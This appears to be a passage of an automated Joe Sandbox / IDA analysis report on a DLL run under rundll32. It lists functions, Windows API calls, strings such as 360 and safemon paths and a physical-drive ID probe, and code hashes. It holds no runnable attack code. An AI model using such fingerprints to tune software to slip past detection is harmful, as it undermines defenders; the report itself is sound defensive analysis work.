Part of subcall function 0000000180019044: FindResourceW.KERNEL32 ref: 0000000180019085
Part of subcall function 0000000180019044: SizeofResource.KERNEL32 ref: 0000000180019099
Part of subcall function 0000000180019044: LoadResource.KERNEL32 ref: 00000001800190A8
Part of subcall function 0000000180019044: LockResource.KERNEL32 ref: 00000001800190B9
Part of subcall function 0000000180019044: malloc.MSVCRT ref: 00000001800190CA
Part of subcall function 0000000180019044: memmove.MSVCRT ref: 00000001800190E1
Part of subcall function 0000000180019044: FreeResource.KERNEL32 ref: 00000001800190E9
Part of subcall function 0000000180019044: FreeLibrary.KERNEL32 ref: 00000001800190F2
Part of subcall function 0000000180019044: VerQueryValueW.VERSION ref: 000000018001911A
Part of subcall function 0000000180019044: free.MSVCRT ref: 000000018001913F

Strings

%u.%u.%u, xrefs: 00000001800403D4
\Internet Explorer\IEXPLORE.EXE, xrefs: 00000001800403A6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
API String ID: 28297470-3177478685
Opcode ID: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
Instruction ID: 8c267d1c97a4f3ae60188c217bf77148b2efdc3265efdf379ec177d08f4db65c
Opcode Fuzzy Hash: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
Instruction Fuzzy Hash: 95118F32325A8986EB91DB25E4457DB7360F78C789F805012B68A47955DF3DC609CF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C7D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

GetModuleFileNameW.KERNEL32 ref: 000000018003C829
PathAppendW.SHLWAPI ref: 000000018003C83B
PathFileExistsW.SHLWAPI ref: 000000018003C846

Strings

..\360NetBase64.dll, xrefs: 000000018003C82F

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
String ID: ..\360NetBase64.dll
API String ID: 2373086246-4183035884
Opcode ID: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
Instruction ID: af5cf4f44f90b4c64e773468feb6851d22c47134ddc293a853e7e5ebda926cde
Opcode Fuzzy Hash: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
Instruction Fuzzy Hash: 25114C71614A4981FBF3AB60E8953DB23A0FB8D7C9F518115B58D825A5EF28C74DC702

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002DE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 0000000180002E06
wcsncmp.MSVCRT ref: 0000000180002E20
PathIsDirectoryW.SHLWAPI ref: 0000000180002E34

Strings

\\?\, xrefs: 0000000180002DFF

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: wcsncmp$DirectoryPath
String ID: \\?\
API String ID: 911398208-4282027825
Opcode ID: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
Instruction ID: 9903006c7179f3997e6314bb7e882962eeb1ce79a0b7cc9db4c5bfd4c7dd6eaa
Opcode Fuzzy Hash: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
Instruction Fuzzy Hash: E501AD3036568882FBA2EB25EC457E97214BB4CBD0F848235B96A8B1E5DF6CC34DC304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800142E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180014317
GetModuleFileNameW.KERNEL32 ref: 000000018001432E
PathAppendW.SHLWAPI ref: 0000000180014340

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

Strings

..\safemon\FreeSaaS.tpi, xrefs: 0000000180014334

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
String ID: ..\safemon\FreeSaaS.tpi
API String ID: 154803636-205188023
Opcode ID: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
Instruction ID: d74fc56e569283819db6817bdf86699dd223bda9e6afadc26b68049d38556e4d
Opcode Fuzzy Hash: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
Instruction Fuzzy Hash: B5016D35219A8C82FBE2D721EC693D92790B78D388F80D041A4AA077A1DF2DC30DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800560C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B

Strings

D:P(OA;;FA;;;WD), xrefs: 00000001800560EC

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
String ID: D:P(OA;;FA;;;WD)
API String ID: 794372803-936388898
Opcode ID: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
Instruction ID: 0d5b46b33c23d90729eae48064ade5dfd8da35591b75e80b0d34519ac450dbba
Opcode Fuzzy Hash: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
Instruction Fuzzy Hash: 44014B72A14F4486EB518F21F8487A973E0F78CBD4F468221EA5D87714DF38C658C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002AD5C Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 381COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_wcsicmp.MSVCRT ref: 000000018002AE4E

Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B

Strings

, xrefs: 000000018002B093
ftp:, xrefs: 000000018002AE44
CLSID, xrefs: 000000018002AEFC

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FromHeapProcessString_wcsicmp
String ID: $CLSID$ftp:
API String ID: 2012545421-381575252
Opcode ID: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
Instruction ID: d299122ce3e9d517528ccb327dc5a756d1d769515d838a72f3e491c2ced193a8
Opcode Fuzzy Hash: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
Instruction Fuzzy Hash: 41F14073301B4886EB52DB29D8407DE7361F789BE9F448311AA6D876E5DF78CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006616C Relevance: 6.3, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001800661AC
LeaveCriticalSection.KERNEL32 ref: 00000001800661F5

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

malloc.MSVCRT ref: 000000018006621C
memmove.MSVCRT ref: 0000000180066241
free.MSVCRT ref: 0000000180066272

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
String ID:
API String ID: 1740668140-0
Opcode ID: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
Instruction ID: e94a3ea1fea36b0b32ca35adaff13378f84fa0a728ffd439e1abdc7c1a055df0
Opcode Fuzzy Hash: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
Instruction Fuzzy Hash: 4D316C32605B4886EB828F15EC543D977A5F79CBE4F59C225EAA9077A5CF3CC249C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002CD40 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 142COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 000000018002CE3A

Strings

{0CF774D0-F077-11D1-B1BC-00C04F86C324}, xrefs: 000000018002CE2F
ScriptEngine, xrefs: 000000018002CD6C
ScriptHostEncode, xrefs: 000000018002CDE1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp
String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
API String ID: 2081463915-2936173157
Opcode ID: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
Instruction ID: 292b1ab8c79ee979d74f734f58635ebd7dc6439912a4449b937fba72fcba6d7c
Opcode Fuzzy Hash: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
Instruction Fuzzy Hash: 5B514F72711E4986EB419F79C8807CC2760FB49BF4F449322AA3E936E5DF64C989C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C208 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?), ref: 000000018003C25E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?), ref: 000000018003C2A7
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003C30E
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003C3A4

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C20C Relevance: 6.1, APIs: 4, Instructions: 128COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

SysFreeString.OLEAUT32 ref: 000000018004C293
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004C2A6
??3@YAXPEAX@Z.MSVCRT ref: 000000018004C2B9
SysFreeString.OLEAUT32 ref: 000000018004C385

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??2@Free$??3@Alloc
String ID:
API String ID: 1832687772-0
Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072146 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072156
wcstol.MSVCRT ref: 0000000180072185
_errno.MSVCRT ref: 0000000180072197
free.MSVCRT ref: 00000001800723C6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072242 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007224E
wcstol.MSVCRT ref: 000000018007227D
_errno.MSVCRT ref: 000000018007228F
free.MSVCRT ref: 00000001800723C6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000ADF4 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000018000AE88
GetLastError.KERNEL32 ref: 000000018000AE9A
WideCharToMultiByte.KERNEL32 ref: 000000018000AEC4
WideCharToMultiByte.KERNEL32 ref: 000000018000AEFA

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006C200 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B

Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363

memset.MSVCRT ref: 000000018006C2AB

Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308

Part of subcall function 000000018006BD88: memmove.MSVCRT ref: 000000018006BDDE

Strings

\\.\PhysicalDrive%d, xrefs: 000000018006C25A
DISKID:, xrefs: 000000018006C2EC

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
String ID: DISKID:$\\.\PhysicalDrive%d
API String ID: 1541746987-3765948602
Opcode ID: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
Instruction ID: 026b1f04e6263926176f9cf333c98f43658e4a5f02bea82afa83b16206533a48
Opcode Fuzzy Hash: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
Instruction Fuzzy Hash: D831063220474542FBA29B66AC00BEA7392F789BD4F608121BE5947795DF3CC749CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E200 Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32 ref: 000000018001E242
RegDeleteKeyW.ADVAPI32 ref: 000000018001E265
RegDeleteKeyW.ADVAPI32 ref: 000000018001E293
RegDeleteKeyW.ADVAPI32 ref: 000000018001E2B6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Delete
String ID:
API String ID: 1035893169-0
Opcode ID: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
Instruction ID: 40b5deca117a7cefaab46096add2d716b918ff16b730c8479b301d173d09ace7
Opcode Fuzzy Hash: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
Instruction Fuzzy Hash: 44219031705E8840FBAADBA2991079D6299BB4EFC0F1DC525FD2A437D4DE38C7488311

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800324A4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 00000001800324C4

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 000000018003251C
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003252F
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032542

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
Instruction ID: 2d82027f7e94cb9bcb22be17a4537bea80464cdcc919518384ddf93808e552b3
Opcode Fuzzy Hash: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
Instruction Fuzzy Hash: 0521C432611E4482EB529F29D85039EB3A0FB89BF4F198711EA794B6E8DF7CC2448700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180032A90 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 0000000180032AB3

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
